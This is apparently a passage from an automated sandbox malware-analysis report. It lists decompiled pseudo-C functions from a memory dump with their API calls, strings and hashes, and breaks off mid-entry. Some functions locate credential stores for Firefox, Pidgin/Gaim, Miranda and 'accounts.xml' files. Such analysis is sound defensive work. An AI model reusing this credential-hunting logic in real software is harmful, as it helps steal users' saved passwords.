				 *((intOrPtr*)(_t35 + 0x50)) =  *((intOrPtr*)(_t35 + 0x10));
				 *((intOrPtr*)(_t35 + 0x54)) =  *((intOrPtr*)(_t35 + 0x14));
				E0040CA46(_t35 + 0x18, _t35);
				memcpy(_a4, _t35, 0x10);
				return memset(_t35, 0, 4);
			}










                                0x0040c9c7
                                0x0040c9cf
                                0x0040c9d0
                                0x0040c9d2
                                0x0040c9d6
                                0x0040c9d9
                                0x0040c9db
                                0x0040c9df
                                0x0040ca0e
                                0x0040c9e1
                                0x0040c9e6
                                0x0040c9eb
                                0x0040c9f2
                                0x0040c9fc
                                0x0040ca04
                                0x0040ca19
                                0x0040ca1f
                                0x0040ca27
                                0x0040ca33
                                0x0040ca45

                                APIs
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memset$memcpy
                                • String ID:
                                • API String ID: 368790112-0
                                • Opcode ID: db955d66aa391fc484fd506110ad959e30d2163aa55218731a18cbda7d247bce
                                • Instruction ID: 72ff1d110960cc82dd2bfc388b685e2dd0a1937d99bf851f24f672c8116534dd
                                • Opcode Fuzzy Hash: db955d66aa391fc484fd506110ad959e30d2163aa55218731a18cbda7d247bce
                                • Instruction Fuzzy Hash: 4C0128B1740B00B6D231EF29DC43F6A7BA49F91B18F100B1EF1526A6C1E7B8B244865D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040AE7D, Relevance: 6.1, APIs: 4, Instructions: 114stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 64%
                                			E0040AE7D(void* __eax, void* __eflags, char* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				signed int _t63;
				intOrPtr _t67;
				intOrPtr _t72;
				intOrPtr _t74;
				signed int _t79;
				void* _t84;
				signed int _t86;
				signed int _t87;
				char* _t98;
				void* _t100;
				void* _t102;
				void* _t104;
				void* _t106;
				void* _t107;

				_t84 = __eax;
				E0040972B(__eax, __eflags);
				_t86 = 0;
				_v12 = 0;
				while(1) {
					_t98 = _a4;
					if( *((intOrPtr*)(_t86 + _t98)) - 0x30 > 9) {
						break;
					}
					_t86 = _t86 + 1;
					if(_t86 < 1) {
						continue;
					}
					if(strlen(_t98) >= 3) {
						break;
					}
					_t79 = atoi(_a4);
					if(_t79 >= 0 && _t79 <  *((intOrPtr*)(_t84 + 0x20))) {
						_v12 =  *((intOrPtr*)( *( *((intOrPtr*)(_t84 + 0x24)) + _t79 * 4) * 0x14 +  *((intOrPtr*)(_t84 + 0x1b4))));
					}
					L21:
					if(_a8 != 0) {
						_v12 = _v12 | 0x00001000;
					}
					_t87 =  *0x41e394; // 0x1
					_t63 = _v12;
					 *0x41e394 =  *0x41e394 + 1;
					 *((intOrPtr*)(0x41e398 + _t87 * 4)) = _t63;
					return _t63;
				}
				_t104 = 0;
				__eflags =  *((intOrPtr*)(_t84 + 0x1b0));
				_v16 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(_t84 + 0x1b0)) <= 0) {
					L14:
					_t100 = 0;
					__eflags =  *((intOrPtr*)(_t84 + 0x1b0));
					_v8 = 0;
					if( *((intOrPtr*)(_t84 + 0x1b0)) <= 0) {
						L20:
						goto L21;
					}
					_t106 = 0;
					__eflags = 0;
					do {
						_v20 = E00407139(0, _a4);
						_t67 = E00407139(0, _a4);
						__eflags = _v20;
						if(_v20 >= 0) {
							L18:
							_v12 =  *((intOrPtr*)(_t106 +  *((intOrPtr*)(_t84 + 0x1b4))));
							goto L19;
						}
						__eflags = _t67;
						if(_t67 < 0) {
							goto L19;
						}
						goto L18;
						L19:
						_v8 = _v8 + 1;
						_t100 = _t100 + 0x10;
						_t106 = _t106 + 0x14;
						__eflags = _v8 -  *((intOrPtr*)(_t84 + 0x1b0));
					} while (_v8 <  *((intOrPtr*)(_t84 + 0x1b0)));
					goto L20;
				}
				_t102 = 0;
				__eflags = 0;
				do {
					_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x1b4)) + _t104 + 0x10));
					0x413d74(_t72, _a4);
					_v20 = _t72;
					_t74 =  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x34)) + _t102 + 0xc));
					0x413d74(_t74, _a4);
					_t107 = _t107 + 0x10;
					__eflags = _v20;
					if(_v20 == 0) {
						L11:
						_v12 =  *(_t104 +  *((intOrPtr*)(_t84 + 0x1b4)));
						_v16 = 1;
						goto L12;
					}
					__eflags = _t74;
					if(_t74 != 0) {
						goto L12;
					}
					goto L11;
					L12:
					_v8 = _v8 + 1;
					_t102 = _t102 + 0x10;
					_t104 = _t104 + 0x14;
					__eflags = _v8 -  *((intOrPtr*)(_t84 + 0x1b0));
				} while (_v8 <  *((intOrPtr*)(_t84 + 0x1b0)));
				__eflags = _v16;
				if(_v16 != 0) {
					goto L20;
				}
				goto L14;
			}






















                                0x0040ae84
                                0x0040ae86
                                0x0040ae8b
                                0x0040ae8d
                                0x0040ae90
                                0x0040ae90
                                0x0040ae9a
                                0x00000000
                                0x00000000
                                0x0040ae9c
                                0x0040aea0
                                0x00000000
                                0x00000000
                                0x0040aeac
                                0x00000000
                                0x00000000
                                0x0040aeb1
                                0x0040aeb9
                                0x0040aeda
                                0x0040aeda
                                0x0040afbb
                                0x0040afc0
                                0x0040afc2
                                0x0040afc2
                                0x0040afc9
                                0x0040afcf
                                0x0040afd2
                                0x0040afd8
                                0x0040afe0
                                0x0040afe0
                                0x0040aee3
                                0x0040aee5
                                0x0040aeec
                                0x0040aeef
                                0x0040aef2
                                0x0040af56
                                0x0040af56
                                0x0040af58
                                0x0040af5e
                                0x0040af61
                                0x0040afb9
                                0x00000000
                                0x0040afba
                                0x0040af63
                                0x0040af63
                                0x0040af65
                                0x0040af83
                                0x0040af88
                                0x0040af8d
                                0x0040af93
                                0x0040af99
                                0x0040afa2
                                0x00000000
                                0x0040afa2
                                0x0040af95
                                0x0040af97
                                0x00000000
                                0x00000000
                                0x00000000
                                0x0040afa5
                                0x0040afa5
                                0x0040afab
                                0x0040afae
                                0x0040afb1
                                0x0040afb1
                                0x00000000
                                0x0040af65
                                0x0040aef4
                                0x0040aef4
                                0x0040aef6
                                0x0040aefc
                                0x0040af04
                                0x0040af0c
                                0x0040af12
                                0x0040af17
                                0x0040af1c
                                0x0040af1f
                                0x0040af23
                                0x0040af29
                                0x0040af32
                                0x0040af35
                                0x00000000
                                0x0040af35
                                0x0040af25
                                0x0040af27
                                0x00000000
                                0x00000000
                                0x00000000
                                0x0040af3c
                                0x0040af3c
                                0x0040af42
                                0x0040af45
                                0x0040af48
                                0x0040af48
                                0x0040af50
                                0x0040af54
                                0x00000000
                                0x00000000
                                0x00000000

                                APIs
                                  • Part of subcall function 0040972B: ??2@YAPAXI@Z.MSVCRT ref: 0040974C
                                  • Part of subcall function 0040972B: ??3@YAXPAX@Z.MSVCRT ref: 00409813
                                • strlen.MSVCRT ref: 0040AEA3
                                • atoi.MSVCRT ref: 0040AEB1
                                • _mbsicmp.MSVCRT ref: 0040AF04
                                • _mbsicmp.MSVCRT ref: 0040AF17
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _mbsicmp$??2@??3@atoistrlen
                                • String ID:
                                • API String ID: 4107816708-0
                                • Opcode ID: 3a59e25db7847bfcb7a2cf7fa4c60edbf2d33e4cde8c95d2bbbe957afd87409f
                                • Instruction ID: 08bf478f3eb11018bf028c01ffb7f168253fa3ae9792e106a9a4f60ade7b3b20
                                • Opcode Fuzzy Hash: 3a59e25db7847bfcb7a2cf7fa4c60edbf2d33e4cde8c95d2bbbe957afd87409f
                                • Instruction Fuzzy Hash: B8414975900305EFCB11DF69D580A9ABBF4FB48308F1084BAEC15AB392D778DA51CB59
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00413646, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 84stringCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: strlen
                                • String ID: >$>$>
                                • API String ID: 39653677-3911187716
                                • Opcode ID: fe18d8dd2c8264a7d2d3ac72613768907538146584e0663d827c53e1f55572e9
                                • Instruction ID: dc7a302430b06bbc29ce8331a0d654e54ba56492e0c60a2da2e35593be10561b
                                • Opcode Fuzzy Hash: fe18d8dd2c8264a7d2d3ac72613768907538146584e0663d827c53e1f55572e9
                                • Instruction Fuzzy Hash: 7B31FBA580D2C4AED7219F6880557EEFFA14F22305F1886DAC0D447383C22C9BCAD75A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040EA56, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 72stringCOMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 0040EA89
                                • strlen.MSVCRT ref: 0040EA8F
                                • strlen.MSVCRT ref: 0040EA9C
                                  • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                  • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: strlen$_mbscat_mbscpymemset
                                • String ID: accounts.xml
                                • API String ID: 581844971-666780623
                                • Opcode ID: 3b236e653348da5417edaa74ab4b2c2d6336b1da36662295ef381eeb4047c0c7
                                • Instruction ID: 3a6749a91d87314aa81efbea2023e77c1fe97455d9ba7aea10baf3c7dddfb932
                                • Opcode Fuzzy Hash: 3b236e653348da5417edaa74ab4b2c2d6336b1da36662295ef381eeb4047c0c7
                                • Instruction Fuzzy Hash: 9C210471A041186BCB10EB66DC416DFB7F8AF55314F0484BBE009E7142DBB8EA958FE8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040EB3D, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 72stringCOMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 0040EB70
                                • strlen.MSVCRT ref: 0040EB76
                                • strlen.MSVCRT ref: 0040EB83
                                  • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                  • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: strlen$_mbscat_mbscpymemset
                                • String ID: accounts.xml
                                • API String ID: 581844971-666780623
                                • Opcode ID: 525a6947399d2dc96bd98280f09e98ebf0a88ac4f7fc2c84a32f5a3fc94ac3d7
                                • Instruction ID: f45e0dada1ac7c46e734b25b908a600237734d5f3cbc55dd7ef5ba4cf50aaebb
                                • Opcode Fuzzy Hash: 525a6947399d2dc96bd98280f09e98ebf0a88ac4f7fc2c84a32f5a3fc94ac3d7
                                • Instruction Fuzzy Hash: AD21F5719041185BDB11EB26DC41ACA77BC5F51314F0484BBA508E7141DBB8EAD68FD8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00407364, Relevance: 6.1, APIs: 4, Instructions: 65stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 58%
                                			E00407364(void* __eax, char* _a4, int _a8) {
				void* __edi;
				intOrPtr _t30;
				intOrPtr _t33;
				intOrPtr _t44;
				intOrPtr _t52;
				intOrPtr* _t54;
				intOrPtr* _t55;
				void* _t56;

				_t56 = __eax;
				if(_a8 == 0xffffffff) {
					_a8 = strlen(_a4);
				}
				_t44 =  *((intOrPtr*)(_t56 + 4));
				_t52 = _t44 + _a8 + 1;
				_t30 =  *((intOrPtr*)(_t56 + 0x14));
				 *((intOrPtr*)(_t56 + 4)) = _t52;
				_t54 = _t56 + 0x10;
				if(_t52 != 0xffffffff) {
					E00406982(_t56, _t52, _t54, 1, _t30);
				} else {
					0x413de6( *_t54);
				}
				_t53 =  *(_t56 + 0x1c);
				_t33 =  *((intOrPtr*)(_t56 + 0x18));
				_t55 = _t56 + 0xc;
				if( *(_t56 + 0x1c) != 0xffffffff) {
					E00406982(_t56 + 8, _t53, _t55, 4, _t33);
				} else {
					0x413de6( *_t55);
				}
				memcpy( *((intOrPtr*)(_t56 + 0x10)) + _t44, _a4, _a8);
				 *((char*)( *((intOrPtr*)(_t56 + 0x10)) + _t44 + _a8)) = 0;
				 *((intOrPtr*)( *_t55 +  *(_t56 + 0x1c) * 4)) = _t44;
				 *(_t56 + 0x1c) =  *(_t56 + 0x1c) + 1;
				_t27 =  *(_t56 + 0x1c) - 1; // -1
				return _t27;
			}











                                0x0040736e
                                0x00407370
                                0x0040737b
                                0x0040737b
                                0x0040737e
                                0x00407384
                                0x0040738b
                                0x0040738e
                                0x00407391
                                0x00407394
                                0x004073a4
                                0x00407396
                                0x00407398
                                0x00407398
                                0x004073aa
                                0x004073b0
                                0x004073b4
                                0x004073b7
                                0x004073c8
                                0x004073b9
                                0x004073bb
                                0x004073bb
                                0x004073db
                                0x004073e8
                                0x004073f4
                                0x004073f7
                                0x004073fe
                                0x00407404

                                APIs
                                • strlen.MSVCRT ref: 00407375
                                  • Part of subcall function 00406982: malloc.MSVCRT ref: 0040699E
                                  • Part of subcall function 00406982: memcpy.MSVCRT ref: 004069B6
                                  • Part of subcall function 00406982: ??3@YAXPAX@Z.MSVCRT ref: 004069BF
                                • ??3@YAXPAX@Z.MSVCRT ref: 00407398
                                • ??3@YAXPAX@Z.MSVCRT ref: 004073BB
                                • memcpy.MSVCRT ref: 004073DB
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ??3@$memcpy$mallocstrlen
                                • String ID:
                                • API String ID: 1171893557-0
                                • Opcode ID: 5eae7e510f03a6352586b84f7b01f0a0acff8e55822a1d9b26e8cfb98cebd805
                                • Instruction ID: d47861f91907e87d10e443503ad883c0cefe0bd36095b640ea2ff485cde935f6
                                • Opcode Fuzzy Hash: 5eae7e510f03a6352586b84f7b01f0a0acff8e55822a1d9b26e8cfb98cebd805
                                • Instruction Fuzzy Hash: 53218C71204604AFD730DF18E881996B7F5EF04324B208A2EFC6A9B6D1C735FA59CB55
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00407944, Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                Download Yara Rule
                                C-Code - Quality: 37%
                                			E00407944(void** __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _t21;
				signed int _t23;
				void* _t24;
				signed int _t31;
				void* _t32;
				void* _t33;
				void* _t44;
				signed int _t46;
				void* _t48;
				signed int _t51;
				int _t52;
				void** _t53;
				void* _t58;

				_t53 = __esi;
				_t1 =  &(_t53[1]); // 0x0
				_t51 =  *_t1;
				_t21 = 0;
				if(_t51 <= 0) {
					L4:
					_t2 =  &(_t53[2]); // 0x8
					_t33 =  *_t53;
					_t23 =  *_t2 + _t51;
					_t46 = 8;
					_t53[1] = _t23;
					_t24 = _t23 * _t46;
					0x413d5c( ~(0 | _t58 > 0x00000000) | _t24, _t32);
					_t10 =  &(_t53[1]); // 0x0
					 *_t53 = _t24;
					memset(_t24, 0,  *_t10 << 3);
					_t52 = _t51 << 3;
					memcpy( *_t53, _t33, _t52);
					if(_t33 != 0) {
						0x413d56(_t33);
					}
					 *((intOrPtr*)( *_t53 + _t52)) = _a4;
					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
				} else {
					_t44 =  *__esi;
					_t48 = _t44;
					while( *_t48 != 0) {
						_t21 = _t21 + 1;
						_t48 = _t48 + 8;
						_t58 = _t21 - _t51;
						if(_t58 < 0) {
							continue;
						} else {
							goto L4;
						}
						goto L7;
					}
					_t31 = _t21 << 3;
					 *((intOrPtr*)(_t44 + _t31)) = _a4;
					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
				}
				L7:
				return 1;
			}
















                                0x00407944
                                0x00407945
                                0x00407945
                                0x00407948
                                0x0040794c
                                0x0040795f
                                0x0040795f
                                0x00407963
                                0x00407965
                                0x0040796b
                                0x0040796c
                                0x0040796f
                                0x00407979
                                0x0040797e
                                0x00407988
                                0x0040798a
                                0x0040798f
                                0x00407996
                                0x004079a0
                                0x004079a3
                                0x004079a8
                                0x004079af
                                0x004079b8
                                0x0040794e
                                0x0040794e
                                0x00407950
                                0x00407952
                                0x00407957
                                0x00407958
                                0x0040795b
                                0x0040795d
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x0040795d
                                0x004079c8
                                0x004079cb
                                0x004079d4
                                0x004079d4
                                0x004079bd
                                0x004079c1

                                APIs
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ??2@??3@memcpymemset
                                • String ID:
                                • API String ID: 1865533344-0
                                • Opcode ID: da379349a0878454dd0175aad334c0a6b10e522537b17fbd02a48e17a58ffbf9
                                • Instruction ID: be4f301e428eab7478e357bf13cd6827c7edeb2881237a21e1a336ab79825493
                                • Opcode Fuzzy Hash: da379349a0878454dd0175aad334c0a6b10e522537b17fbd02a48e17a58ffbf9
                                • Instruction Fuzzy Hash: C8116DB1608601AFE329DF19D881A26F7E5FF88300F20892EE4DA87391D635E841CB55
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040E4B6, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 51stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E0040E4B6(intOrPtr _a4, char* _a8) {
				intOrPtr _v8;
				void _v275;
				char _v276;
				int _t17;
				void* _t21;

				_v8 = 1;
				_v276 = 0;
				memset( &_v275, 0, 0x104);
				_t17 = strlen(_a8);
				_t6 = strlen(0x41894c) + 1; // 0x1
				if(_t17 + _t6 >= 0x104) {
					_v276 = 0;
				} else {
					E00406B4B( &_v276, _a8, 0x41894c);
				}
				_t21 = E004069D3( &_v276);
				_t38 = _t21;
				if(_t21 != 0) {
					_v8 = E0040E293(_t38, _a4,  &_v276);
				}
				return _v8;
			}








                                0x0040e4d1
                                0x0040e4d8
                                0x0040e4df
                                0x0040e4ea
                                0x0040e4fd
                                0x0040e504
                                0x0040e519
                                0x0040e506
                                0x0040e510
                                0x0040e516
                                0x0040e527
                                0x0040e52c
                                0x0040e52f
                                0x0040e540
                                0x0040e540
                                0x0040e54a

                                APIs
                                • memset.MSVCRT ref: 0040E4DF
                                • strlen.MSVCRT ref: 0040E4EA
                                • strlen.MSVCRT ref: 0040E4F8
                                  • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                  • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: strlen$_mbscat_mbscpymemset
                                • String ID: prefs.js
                                • API String ID: 581844971-3783873740
                                • Opcode ID: e695a85550e18a578563b94c74fc6493014cfdadf8041b930889a3e806ae1ffc
                                • Instruction ID: 18aa10c61fb3677f8c34c5df747d0d2d010b9cd1cf1f562783039ea2ec755a14
                                • Opcode Fuzzy Hash: e695a85550e18a578563b94c74fc6493014cfdadf8041b930889a3e806ae1ffc
                                • Instruction Fuzzy Hash: 9C01C87190011CBADB11EA95EC42BCABBAC9F0531DF1008BBE604E2181E7B49B948794
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040D4E9, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 50stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 79%
                                			E0040D4E9(void* __eax) {
				void _v267;
				char _v268;
				int _t12;
				char _t16;
				char* _t27;

				_t27 = __eax + 0x20a;
				 *_t27 = 0;
				_v268 = 0;
				memset( &_v267, 0, 0x104);
				0x41223f(0x1a);
				_t12 = strlen("Mozilla\Profiles");
				_t6 = strlen( &_v268) + 1; // 0x1
				if(_t12 + _t6 >= 0x104) {
					 *_t27 = 0;
				} else {
					E00406B4B(_t27,  &_v268, "Mozilla\Profiles");
				}
				_t16 = E004069D3(_t27);
				if(_t16 == 0) {
					 *_t27 = _t16;
					return _t16;
				}
				return _t16;
			}








                                0x0040d505
                                0x0040d50c
                                0x0040d50f
                                0x0040d516
                                0x0040d524
                                0x0040d52e
                                0x0040d541
                                0x0040d54a
                                0x0040d563
                                0x0040d54c
                                0x0040d55a
                                0x0040d560
                                0x0040d567
                                0x0040d56f
                                0x0040d571
                                0x00000000
                                0x0040d571
                                0x0040d577

                                APIs
                                • memset.MSVCRT ref: 0040D516
                                  • Part of subcall function 0041223F: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000000,00000104), ref: 00412279
                                • strlen.MSVCRT ref: 0040D52E
                                • strlen.MSVCRT ref: 0040D53C
                                  • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                  • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: strlen$FolderPathSpecial_mbscat_mbscpymemset
                                • String ID: Mozilla\Profiles
                                • API String ID: 2008385565-2796945589
                                • Opcode ID: 5a999460c3217843dc6f32f88e89d1702dbadaddf9eabefba75398abb63b17c1
                                • Instruction ID: 3c6ae931ffe100bc814a6c4c739c4374e257fa1fb59e82d364b3a540d615c615
                                • Opcode Fuzzy Hash: 5a999460c3217843dc6f32f88e89d1702dbadaddf9eabefba75398abb63b17c1
                                • Instruction Fuzzy Hash: 2201F07290821466D711A6699C42FCA779C4F21759F2404BBF5C5F31C2EDB899C443A9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040D578, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 50stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 79%
                                			E0040D578(void* __eax) {
				void _v267;
				char _v268;
				int _t12;
				char _t16;
				char* _t27;

				_t27 = __eax + 0x61e;
				 *_t27 = 0;
				_v268 = 0;
				memset( &_v267, 0, 0x104);
				0x41223f(0x1a);
				_t12 = strlen(".purple");
				_t6 = strlen( &_v268) + 1; // 0x1
				if(_t12 + _t6 >= 0x104) {
					 *_t27 = 0;
				} else {
					E00406B4B(_t27,  &_v268, ".purple");
				}
				_t16 = E004069D3(_t27);
				if(_t16 == 0) {
					 *_t27 = _t16;
					return _t16;
				}
				return _t16;
			}








                                0x0040d594
                                0x0040d59b
                                0x0040d59e
                                0x0040d5a5
                                0x0040d5b3
                                0x0040d5bd
                                0x0040d5d0
                                0x0040d5d9
                                0x0040d5f2
                                0x0040d5db
                                0x0040d5e9
                                0x0040d5ef
                                0x0040d5f6
                                0x0040d5fe
                                0x0040d600
                                0x00000000
                                0x0040d600
                                0x0040d606

                                APIs
                                • memset.MSVCRT ref: 0040D5A5
                                  • Part of subcall function 0041223F: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000000,00000104), ref: 00412279
                                • strlen.MSVCRT ref: 0040D5BD
                                • strlen.MSVCRT ref: 0040D5CB
                                  • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                  • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: strlen$FolderPathSpecial_mbscat_mbscpymemset
                                • String ID: .purple
                                • API String ID: 2008385565-1504268026
                                • Opcode ID: 2ac43bd667000255b1d56cb9d4d28ea446a45af95856c73e5f907134ba4c6b56
                                • Instruction ID: 5dc147b8957afa7b06b9bacfad0a4e1db4396cb0d3e541dfcccdd27de6d8d665
                                • Opcode Fuzzy Hash: 2ac43bd667000255b1d56cb9d4d28ea446a45af95856c73e5f907134ba4c6b56
                                • Instruction Fuzzy Hash: 8C0120725081146AD711A669DC42BCA779C4F21709F2404BFF5C5F71C2FEB899C543AD
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040D607, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 50stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 79%
                                			E0040D607(void* __eax) {
				void _v267;
				char _v268;
				int _t12;
				char _t16;
				char* _t27;

				_t27 = __eax + 0x30f;
				 *_t27 = 0;
				_v268 = 0;
				memset( &_v267, 0, 0x104);
				0x41223f(0x1a);
				_t12 = strlen(".gaim");
				_t6 = strlen( &_v268) + 1; // 0x1
				if(_t12 + _t6 >= 0x104) {
					 *_t27 = 0;
				} else {
					E00406B4B(_t27,  &_v268, ".gaim");
				}
				_t16 = E004069D3(_t27);
				if(_t16 == 0) {
					 *_t27 = _t16;
					return _t16;
				}
				return _t16;
			}








                                0x0040d623
                                0x0040d62a
                                0x0040d62d
                                0x0040d634
                                0x0040d642
                                0x0040d64c
                                0x0040d65f
                                0x0040d668
                                0x0040d681
                                0x0040d66a
                                0x0040d678
                                0x0040d67e
                                0x0040d685
                                0x0040d68d
                                0x0040d68f
                                0x00000000
                                0x0040d68f
                                0x0040d695

                                APIs
                                • memset.MSVCRT ref: 0040D634
                                  • Part of subcall function 0041223F: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000000,00000104), ref: 00412279
                                • strlen.MSVCRT ref: 0040D64C
                                • strlen.MSVCRT ref: 0040D65A
                                  • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                  • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: strlen$FolderPathSpecial_mbscat_mbscpymemset
                                • String ID: .gaim
                                • API String ID: 2008385565-3490432478
                                • Opcode ID: adcac243f634cd9f4ba49c533a924e47bd2570a5673518b618adaff46f672105
                                • Instruction ID: a115bc8fa66553d394cd4cab83c679d7ef9605289ec37c5517f9616187ac7207
                                • Opcode Fuzzy Hash: adcac243f634cd9f4ba49c533a924e47bd2570a5673518b618adaff46f672105
                                • Instruction Fuzzy Hash: 540120729082546AD721A6699C42BCB779C4F21709F2008BFF5C8F31C2EEBC5AC543A9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040D696, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 50stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 79%
                                			E0040D696(void* __eax) {
				void _v267;
				char _v268;
				int _t12;
				char _t16;
				char* _t27;

				_t27 = __eax + 0x414;
				 *_t27 = 0;
				_v268 = 0;
				memset( &_v267, 0, 0x104);
				0x41223f(0x1a);
				_t12 = strlen("Miranda");
				_t6 = strlen( &_v268) + 1; // 0x1
				if(_t12 + _t6 >= 0x104) {
					 *_t27 = 0;
				} else {
					E00406B4B(_t27,  &_v268, "Miranda");
				}
				_t16 = E004069D3(_t27);
				if(_t16 == 0) {
					 *_t27 = _t16;
					return _t16;
				}
				return _t16;
			}








                                0x0040d6b2
                                0x0040d6b9
                                0x0040d6bc
                                0x0040d6c3
                                0x0040d6d1
                                0x0040d6db
                                0x0040d6ee
                                0x0040d6f7
                                0x0040d710
                                0x0040d6f9
                                0x0040d707
                                0x0040d70d
                                0x0040d714
                                0x0040d71c
                                0x0040d71e
                                0x00000000
                                0x0040d71e
                                0x0040d724

                                APIs
                                • memset.MSVCRT ref: 0040D6C3
                                  • Part of subcall function 0041223F: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000000,00000104), ref: 00412279
                                • strlen.MSVCRT ref: 0040D6DB
                                • strlen.MSVCRT ref: 0040D6E9
                                  • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                  • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: strlen$FolderPathSpecial_mbscat_mbscpymemset
                                • String ID: Miranda
                                • API String ID: 2008385565-4004425691
                                • Opcode ID: a1f73f7abb57728e4712774607e4362808b5bed289a3dcc15fc17451e6932546
